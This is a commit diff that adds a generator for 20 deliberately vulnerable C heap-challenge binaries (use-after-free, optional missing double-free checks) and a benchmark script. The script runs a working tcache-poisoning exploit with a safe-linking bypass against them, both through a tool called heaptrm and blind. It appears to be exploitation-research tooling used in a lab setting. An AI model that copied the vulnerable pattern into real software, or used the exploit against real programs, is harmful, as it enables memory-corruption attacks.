20-challenge suite benchmark: heaptrm 65% vs blind 25% overall
Easy: 100% vs 75% (+25%), Medium: 83% vs 33% (+50%), Hard: 67% vs 0% (+67%).
heaptrm provides decisive advantage when binary lacks address leaks.
20 binaries with varying UAF read, addr leak, heap noise, slot count.
- cve_tests/gen_challenge_suite.py +241 -0
- cve_tests/run_suite_benchmark.py +295 -0
cve_tests/gen_challenge_suite.py
ADDED
|
@@ -0,0 +1,241 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
gen_challenge_suite.py — Generate 20 heap challenge binaries with varying difficulty.
|
| 4 |
+
|
| 5 |
+
Dimensions of variation:
|
| 6 |
+
- UAF read: yes / no
|
| 7 |
+
- Address leak: prints addrs / prints nothing / prints partial
|
| 8 |
+
- Heap noise: none / light (2-3) / heavy (5-10)
|
| 9 |
+
- Size classes: 1 / 3 / 5
|
| 10 |
+
- Slot count: 4 / 8 / 16
|
| 11 |
+
- Edit size: 8 bytes / full chunk
|
| 12 |
+
- Double-free protection: yes / no
|
| 13 |
+
"""
|
| 14 |
+
|
| 15 |
+
import os
|
| 16 |
+
import subprocess
|
| 17 |
+
import random
|
| 18 |
+
import json
|
| 19 |
+
from pathlib import Path
|
| 20 |
+
|
| 21 |
+
ROOT = Path(__file__).parent.parent
|
| 22 |
+
OUT = ROOT / "cve_tests" / "suite"
|
| 23 |
+
OUT.mkdir(exist_ok=True)
|
| 24 |
+
|
| 25 |
+
# C source template for one challenge binary. It is rendered with str.format(),
# so literal C braces are doubled and single-brace names are placeholders
# supplied by gen_challenge(). The program reads a numeric menu from stdin:
#   1 <slot> <size_class>  allocate      2 <slot> <hex>  edit
#   3 <slot>               show (hex)    4 <slot>        free
#   5                      quit
# The dangling pointer left behind by "free" is deliberate: it is the bug the
# benchmark exploits.
TEMPLATE = r"""
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <time.h>

#define MAX_SLOTS {max_slots}
#define EDIT_MAX {edit_max}

static int sizes[] = {{{sizes_str}}};
static int n_sizes = {n_sizes};

struct slot {{
    char *data;
    int size_idx;
    int active;
}};
static struct slot slots[MAX_SLOTS];

static void heap_noise(void) {{
    srand(time(NULL) ^ getpid());
    int n = {noise_min} + (rand() % {noise_range});
    for (int i = 0; i < n; i++) {{
        int sz = sizes[rand() % n_sizes];
        char *p = malloc(sz);
        /* allocation failed: skip this noise chunk instead of writing to NULL */
        if (!p) continue;
        memset(p, 'N', sz);
        if (rand() % {noise_free_mod} == 0) free(p);
    }}
}}

int main(void) {{
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    heap_noise();
    int choice, slot, sc;
    char hexbuf[520];
    while (scanf("%d", &choice) == 1) {{
        switch (choice) {{
        case 1:
            if (scanf("%d %d", &slot, &sc) != 2) break;
            if (slot < 0 || slot >= MAX_SLOTS || sc < 1 || sc > n_sizes) {{ puts("ERR"); break; }}
            if (slots[slot].data != NULL) {{ puts("ERR"); break; }}
            slots[slot].data = malloc(sizes[sc-1]);
            if (!slots[slot].data) {{ puts("ERR"); break; }}
            memset(slots[slot].data, 0, sizes[sc-1]);
            slots[slot].size_idx = sc-1;
            slots[slot].active = 1;
            {alloc_print}
            break;
        case 2:
            if (scanf("%d %512s", &slot, hexbuf) != 2) break;
            if (slot < 0 || slot >= MAX_SLOTS || !slots[slot].data) {{ puts("ERR"); break; }}
            {{
                unsigned char bytes[256] = {{0}};
                int len = strlen(hexbuf) / 2;
                if (len > EDIT_MAX) len = EDIT_MAX;
                for (int i = 0; i < len; i++) {{
                    /* stays 0 when the two characters are not valid hex */
                    unsigned int b = 0;
                    sscanf(hexbuf + i*2, "%2x", &b);
                    bytes[i] = (unsigned char)b;
                }}
                memcpy(slots[slot].data, bytes, len);
            }}
            puts("OK");
            break;
        case 3:
            if (scanf("%d", &slot) != 1) break;
            if (slot < 0 || slot >= MAX_SLOTS || !slots[slot].data) {{ puts("ERR"); break; }}
            {show_check}
            {{
                unsigned char *p = (unsigned char *)slots[slot].data;
                int n = sizes[slots[slot].size_idx];
                if (n > 32) n = 32;
                for (int i = 0; i < n; i++) printf("%02x", p[i]);
                puts("");
            }}
            break;
        case 4:
            if (scanf("%d", &slot) != 1) break;
            if (slot < 0 || slot >= MAX_SLOTS || !slots[slot].data) {{ puts("ERR"); break; }}
            {double_free_check}
            free(slots[slot].data);
            slots[slot].active = 0;
            {free_print}
            break;
        case 5:
            goto done;
        default:
            puts("ERR");
            break;
        }}
    }}
done:
    return 0;
}}
"""
|
| 122 |
+
|
| 123 |
+
|
| 124 |
+
def gen_challenge(idx, config):
    """Render, compile and record one challenge binary.

    Args:
        idx: Challenge number; used to build the ``chal_NN`` file stem.
        config: Dict with the keys ``sizes``, ``uaf_read``, ``addr_leak``
            (``"full"``, ``"partial"`` or anything else for no leak),
            ``double_free_prot``, ``max_slots``, ``edit_max``, ``noise_min``,
            ``noise_max`` and optionally ``noise_free_mod`` (default 3).
            On success it is updated in place with ``name`` and ``idx``.

    Returns:
        The challenge name (``"chal_NN"``) on success, or ``None`` when gcc
        exits with a non-zero status.
    """
    import sys  # local import: only needed for the compile-failure report

    sizes = config["sizes"]
    sizes_str = ", ".join(str(s) for s in sizes)

    # UAF read protection: without it, "show" works on freed slots.
    if config["uaf_read"]:
        show_check = "/* UAF read allowed */"
    else:
        show_check = 'if (!slots[slot].active) { puts("DELETED"); break; }'

    # Address leak on alloc / free. Only the "full" mode leaks on free.
    leak_mode = config["addr_leak"]
    full_leak = 'printf("OK 0x%lx\\n", (unsigned long)slots[slot].data);'
    plain_ok = 'puts("OK");'
    if leak_mode == "full":
        alloc_print = full_leak
    elif leak_mode == "partial":
        alloc_print = 'printf("OK %x\\n", (unsigned int)((unsigned long)slots[slot].data & 0xffff));'
    else:
        alloc_print = plain_ok
    free_print = full_leak if leak_mode == "full" else plain_ok

    # Double-free protection
    if config["double_free_prot"]:
        double_free_check = 'if (!slots[slot].active) { puts("ERR"); break; }'
    else:
        double_free_check = "/* no double-free check */"

    # The C side computes noise_min + rand() % noise_range, which spans
    # [noise_min, noise_min + noise_range - 1]; the +1 makes noise_max
    # reachable. max(1, ...) keeps the modulus non-zero if max < min.
    noise_range = max(1, config["noise_max"] - config["noise_min"] + 1)

    source = TEMPLATE.format(
        max_slots=config["max_slots"],
        edit_max=config["edit_max"],
        sizes_str=sizes_str,
        n_sizes=len(sizes),
        noise_min=config["noise_min"],
        noise_range=noise_range,
        noise_free_mod=config.get("noise_free_mod", 3),
        alloc_print=alloc_print,
        show_check=show_check,
        free_print=free_print,
        double_free_check=double_free_check,
    )

    name = f"chal_{idx:02d}"
    src_path = OUT / f"{name}.c"
    bin_path = OUT / name

    src_path.write_text(source)
    r = subprocess.run(
        ["gcc", "-o", str(bin_path), str(src_path), "-std=c99", "-g", "-O0", "-Wno-all"],
        capture_output=True, text=True,
    )
    if r.returncode != 0:
        # Surface the compiler output; the caller only learns "it failed".
        print(f"gcc failed for {src_path}:\n{r.stderr}", file=sys.stderr)
        return None

    # Save config (the caller also reuses the mutated dict for the manifest).
    config["name"] = name
    config["idx"] = idx
    (OUT / f"{name}.json").write_text(json.dumps(config, indent=2))

    return name
|
| 187 |
+
|
| 188 |
+
|
| 189 |
+
def main():
    """Generate the 20-challenge suite and write ``manifest.json``.

    Every config is handed to ``gen_challenge``; the ones that compile are
    reported on stdout and collected into the manifest under ``OUT``.
    """
    random.seed(42)

    def cfg(difficulty, uaf_read, addr_leak, noise, sizes, max_slots, edit_max,
            double_free_prot, **extra):
        # Build the dict in a fixed key order so the JSON output is stable:
        # optional extras sit just before "difficulty".
        entry = {
            "uaf_read": uaf_read,
            "addr_leak": addr_leak,
            "noise_min": noise[0],
            "noise_max": noise[1],
            "sizes": sizes,
            "max_slots": max_slots,
            "edit_max": edit_max,
            "double_free_prot": double_free_prot,
        }
        entry.update(extra)
        entry["difficulty"] = difficulty
        return entry

    # Generate 20 challenges with varying difficulty
    configs = [
        # Easy: UAF read, full leak, no noise
        cfg("easy", True, "full", (0, 0), [0x40], 8, 64, False),
        cfg("easy", True, "full", (0, 0), [0x20, 0x40], 8, 64, False),
        cfg("easy", True, "full", (0, 0), [0x40], 16, 8, False),
        cfg("easy", True, "none", (0, 0), [0x40], 8, 64, False),

        # Medium: partial info, some noise
        cfg("medium", True, "none", (2, 4), [0x20, 0x40, 0x80], 8, 8, False),
        cfg("medium", True, "partial", (1, 3), [0x40], 8, 64, True),
        cfg("medium", False, "full", (0, 2), [0x40], 8, 64, False),
        cfg("medium", False, "full", (2, 4), [0x20, 0x40], 8, 8, False),
        cfg("medium", True, "none", (3, 5), [0x40, 0x80], 4, 8, True),
        cfg("medium", False, "partial", (2, 5), [0x20, 0x40, 0x80], 8, 16, False),

        # Hard: no UAF read, no leak, noise
        cfg("hard", False, "none", (3, 6), [0x40], 8, 8, False),
        cfg("hard", False, "none", (3, 7), [0x20, 0x40], 8, 8, True),
        cfg("hard", False, "none", (4, 8), [0x20, 0x40, 0x80], 4, 8, False),
        cfg("hard", False, "none", (5, 10), [0x40], 8, 8, True),
        cfg("hard", False, "none", (3, 6), [0x40, 0x80], 4, 8, False),
        cfg("hard", False, "none", (5, 8), [0x20, 0x40, 0x80], 8, 8, True),

        # Extreme: all mitigations, heavy noise, restricted
        cfg("extreme", False, "none", (8, 12), [0x40], 4, 8, True),
        cfg("extreme", False, "none", (6, 10), [0x20, 0x40, 0x80], 4, 8, True),
        cfg("extreme", False, "none", (10, 15), [0x40], 4, 8, True, noise_free_mod=5),
        cfg("extreme", False, "none", (8, 12), [0x20, 0x40, 0x80, 0x100, 0x200], 4, 8, True),
    ]

    challenges = []
    for i, config in enumerate(configs):
        name = gen_challenge(i, config)
        if not name:
            print(f" FAILED: challenge {i}")
            continue
        print(f" [{config['difficulty']:8s}] {name}: uaf_read={config['uaf_read']} "
              f"leak={config['addr_leak']:7s} noise={config['noise_min']}-{config['noise_max']} "
              f"sizes={len(config['sizes'])} slots={config['max_slots']} edit={config['edit_max']}")
        challenges.append(config)

    # Save manifest
    manifest_path = OUT / "manifest.json"
    manifest_path.write_text(json.dumps(challenges, indent=2))
    print(f"\nGenerated {len(challenges)} challenges in {OUT}")
|
| 238 |
+
|
| 239 |
+
|
| 240 |
+
if __name__ == "__main__":
|
| 241 |
+
main()
|
cve_tests/run_suite_benchmark.py
ADDED
|
@@ -0,0 +1,295 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
run_suite_benchmark.py — Benchmark heaptrm vs blind on 20 challenge binaries.
|
| 4 |
+
"""
|
| 5 |
+
|
| 6 |
+
import subprocess
|
| 7 |
+
import json
|
| 8 |
+
import struct
|
| 9 |
+
import os
|
| 10 |
+
import time
|
| 11 |
+
from pathlib import Path
|
| 12 |
+
from pwn import process as pwn_process, p64, u64, context
|
| 13 |
+
|
| 14 |
+
context.log_level = "error"
|
| 15 |
+
|
| 16 |
+
ROOT = Path(__file__).parent.parent
|
| 17 |
+
SUITE = ROOT / "cve_tests" / "suite"
|
| 18 |
+
HEAPTRM = str(ROOT / "heaptrm-cli" / "target" / "release" / "heaptrm")
|
| 19 |
+
TRIALS = 10
|
| 20 |
+
|
| 21 |
+
|
| 22 |
+
def exploit_heaptrm(binary, config):
    """Attempt the tcache-poisoning exploit while driving the target via heaptrm.

    heaptrm is spoken to over stdin/stdout with one JSON object per line
    (``{"action": ..., "data": ...}``); each command counts as one turn.

    Args:
        binary: Path of the challenge binary to run under heaptrm.
        config: Challenge config; only ``config["sizes"]`` is read here.

    Returns:
        ``(success, turns)`` where ``success`` is True when the marker written
        through slot 4 is visible when reading slot 2.
    """
    turns = 0
    # Prefer the 0x40 size class when the binary offers it, else the first one.
    sizes = config["sizes"]
    sc = sizes.index(0x40) + 1 if 0x40 in sizes else 1

    proc = subprocess.Popen(
        [HEAPTRM, str(binary)],
        stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, text=True
    )

    def cmd(action, data=""):
        nonlocal turns
        turns += 1
        proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n")
        proc.stdin.flush()
        line = proc.stdout.readline()
        return json.loads(line) if line else {}

    def addr_of(chunk):
        return int(chunk["address"], 16)

    try:
        # Alloc 3
        for slot in (0, 1, 2):
            cmd("send", f"1 {slot} {sc}\n")

        # Free 0 and 1
        cmd("send", "4 0\n")
        cmd("send", "4 1\n")

        # Observe — get addresses
        r = cmd("observe")
        if not r.get("heap"):
            cmd("quit")
            return False, turns

        chunks = r["heap"]["chunks"]
        freed = sorted((c for c in chunks if c["state"] == "freed"), key=addr_of)
        allocated = sorted((c for c in chunks if c["state"] == "allocated"), key=addr_of)
        if not freed or not allocated:
            cmd("quit")
            return False, turns

        # Assumes our chunks sit above the noise chunks, so the highest freed
        # address is slot 1 and the highest allocated one is slot 2 — this is
        # a heuristic, not something heaptrm reports directly.
        chunk1_addr = addr_of(freed[-1])
        target_addr = addr_of(allocated[-1])

        # Safe-linking bypass: the stored fd is target ^ (chunk address >> 12).
        poisoned = target_addr ^ (chunk1_addr >> 12)
        fd_hex = struct.pack("<Q", poisoned).hex()[:16]

        # UAF write
        cmd("send", f"2 1 {fd_hex}\n")

        # Drain tcache
        cmd("send", f"1 3 {sc}\n")
        cmd("send", f"1 4 {sc}\n")

        # Write marker through 4, check via 2
        cmd("send", f"2 4 50574e454421210a\n")  # "PWNED!!\n"
        r = cmd("send", "3 2\n")

        cmd("quit")

        # Check output for our marker
        return "50574e4544" in r.get("output", ""), turns
    except Exception:
        # Any protocol/pipe/JSON failure counts as a failed attempt.
        return False, turns
    finally:
        # Always reap the child so repeated trials do not pile up zombies or
        # leak pipe descriptors.
        try:
            proc.stdin.close()
        except OSError:
            pass
        try:
            proc.wait(timeout=1)
        except subprocess.TimeoutExpired:
            proc.kill()
            proc.wait()
        proc.stdout.close()
|
| 101 |
+
|
| 102 |
+
|
| 103 |
+
def exploit_blind(binary, config):
    """Attempt the tcache-poisoning exploit using only the binary's own output.

    Args:
        binary: Path of the challenge binary to run directly.
        config: Challenge config; only ``config["sizes"]`` is read here.

    Returns:
        ``(success, turns)``. ``success`` is always a real ``bool``; ``turns``
        counts the process launch plus every command sent.
    """
    turns = 0
    # Prefer the 0x40 size class when the binary offers it, else the first one.
    sizes = config["sizes"]
    sc = sizes.index(0x40) + 1 if 0x40 in sizes else 1

    p = pwn_process(str(binary))
    turns += 1  # launching the target counts as one turn

    def send(line):
        nonlocal turns
        turns += 1
        p.sendline(line.encode())
        return p.recvline(timeout=0.5).strip()

    def alloc(slot, size_class):
        return send(f"1 {slot} {size_class}")

    def free_s(slot):
        return send(f"4 {slot}")

    def edit(slot, hexdata):
        return send(f"2 {slot} {hexdata}")

    def show(slot):
        return send(f"3 {slot}")

    def parse_addr(reply):
        # Replies look like b"OK 0x55..." only when the binary leaks addresses.
        if not reply or b"0x" not in reply:
            return None
        try:
            return int(reply.split(b"0x")[1].split()[0], 16)
        except (IndexError, ValueError):
            return None

    def attempt(poisoned):
        # Overwrite slot 1's fd, drain the tcache, then write the marker
        # through slot 4 and look for it in slot 2.
        edit(1, p64(poisoned).hex()[:16])
        alloc(3, sc)
        alloc(4, sc)
        edit(4, b"PWNED!!".hex())
        result = show(2)
        # bool(): an empty reply (timeout) must not leak out as b"".
        return bool(result) and b"50574e4544" in result

    try:
        # Extract addresses if binary leaks them
        addr0, addr1, addr2 = (parse_addr(alloc(slot, sc)) for slot in range(3))

        free_s(0)
        free_s(1)

        # Try UAF read
        leak_data = show(1)
        leaked_fd = None
        if leak_data and leak_data not in (b"DELETED", b"ERR") and len(leak_data) >= 16:
            try:
                # The dump prints bytes in memory order, so the first 8 bytes
                # are the little-endian fd pointer.
                leaked_fd = int.from_bytes(bytes.fromhex(leak_data[:16].decode()), "little")
            except ValueError:
                pass

        # Determine what info we have
        if addr1 and addr2:
            # Full addr leak — compute directly
            poisoned = addr2 ^ (addr1 >> 12)
        elif leaked_fd and addr1:
            # addr2 is missing here (otherwise the branch above ran), so
            # there is no target to encode; fall back to 0.
            poisoned = 0
        elif leaked_fd:
            # UAF read only — try to decrypt with guessed key
            guess_key = 0x555555559
            decrypted = leaked_fd ^ guess_key
            if not (0x555555550000 < decrypted < 0x555555570000):
                return False, turns
            # Treat the decrypted fd as chunk 0; assumes 0x50-byte spacing
            # between consecutive chunks — TODO confirm for size classes
            # other than 0x40.
            target = decrypted + 0x50 + 0x50
            poisoned = target ^ guess_key
        elif addr0 and addr2:
            # Alloc leak but no UAF read: guess chunk1 addr as addr0 + 0x50
            poisoned = addr2 ^ ((addr0 + 0x50) >> 12)
        else:
            # No info at all — must guess
            guess_base = 0x555555559000
            # NOTE(review): after the first iteration slots 3 and 4 are
            # already occupied, so later guesses look unable to succeed
            # within the same process — confirm whether a restart per guess
            # was intended.
            for offset in [0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550, 0x600]:
                chunk1_guess = guess_base + offset + 0x50
                target_guess = chunk1_guess + 0x50
                if attempt(target_guess ^ (chunk1_guess >> 12)):
                    return True, turns
            return False, turns

        # Execute with computed poisoned fd
        return attempt(poisoned), turns
    except Exception:
        # Crashed target, closed pipe, etc.: count as a failed attempt.
        return False, turns
    finally:
        try:
            p.close()
        except Exception:
            pass
|
| 222 |
+
|
| 223 |
+
|
| 224 |
+
def main():
    """Run both exploit strategies against every challenge in the manifest.

    Each challenge with an existing binary gets ``TRIALS`` attempts per
    strategy. Per-challenge results and a per-difficulty summary are printed,
    and the results are written to ``benchmark_results.json`` under ``SUITE``.
    When no binary exists, a note is printed and nothing is written.
    """
    manifest = json.loads((SUITE / "manifest.json").read_text())
    rule = "=" * 80

    print(rule)
    print(f"SUITE BENCHMARK: heaptrm vs blind | {len(manifest)} challenges | {TRIALS} trials each")
    print(rule)

    results = []
    for config in manifest:
        name = config["name"]
        binary = SUITE / name
        if not binary.exists():
            continue

        ht_wins = 0
        bl_wins = 0
        ht_turns = 0
        bl_turns = 0

        for _ in range(TRIALS):
            s, turns = exploit_heaptrm(binary, config)
            ht_wins += int(s)
            ht_turns += turns

            s, turns = exploit_blind(binary, config)
            bl_wins += int(s)
            bl_turns += turns

        r = {
            "name": name,
            "difficulty": config["difficulty"],
            "uaf_read": config["uaf_read"],
            "addr_leak": config["addr_leak"],
            "noise": f"{config['noise_min']}-{config['noise_max']}",
            "ht_rate": ht_wins / TRIALS,
            "bl_rate": bl_wins / TRIALS,
            "ht_turns": ht_turns / TRIALS,
            "bl_turns": bl_turns / TRIALS,
        }
        results.append(r)

        delta = r["ht_rate"] - r["bl_rate"]
        marker = ">>>" if delta > 0.5 else "==" if abs(delta) < 0.1 else ">"
        print(f" {name} [{config['difficulty']:8s}] heaptrm={ht_wins}/{TRIALS} blind={bl_wins}/{TRIALS} "
              f"leak={config['addr_leak']:7s} uaf={config['uaf_read']} noise={r['noise']} {marker}")

    if not results:
        # Nothing ran (no binaries on disk): the averages below would divide
        # by zero, so stop here.
        print("\n No challenge binaries found; nothing to summarise.")
        return

    # Summary
    print("\n" + rule)
    print("SUMMARY BY DIFFICULTY")
    print(rule)

    for diff in ["easy", "medium", "hard", "extreme"]:
        group = [r for r in results if r["difficulty"] == diff]
        if not group:
            continue
        ht_avg = sum(r["ht_rate"] for r in group) / len(group)
        bl_avg = sum(r["bl_rate"] for r in group) / len(group)
        print(f" {diff:8s}: heaptrm={ht_avg*100:.0f}% blind={bl_avg*100:.0f}% "
              f"delta={ht_avg*100-bl_avg*100:+.0f}% ({len(group)} challenges)")

    # Overall
    ht_total = sum(r["ht_rate"] for r in results) / len(results)
    bl_total = sum(r["bl_rate"] for r in results) / len(results)
    print(f"\n OVERALL: heaptrm={ht_total*100:.0f}% blind={bl_total*100:.0f}% "
          f"delta={ht_total*100-bl_total*100:+.0f}%")

    # Save
    (SUITE / "benchmark_results.json").write_text(json.dumps(results, indent=2))
|
| 292 |
+
|
| 293 |
+
|
| 294 |
+
if __name__ == "__main__":
|
| 295 |
+
main()
|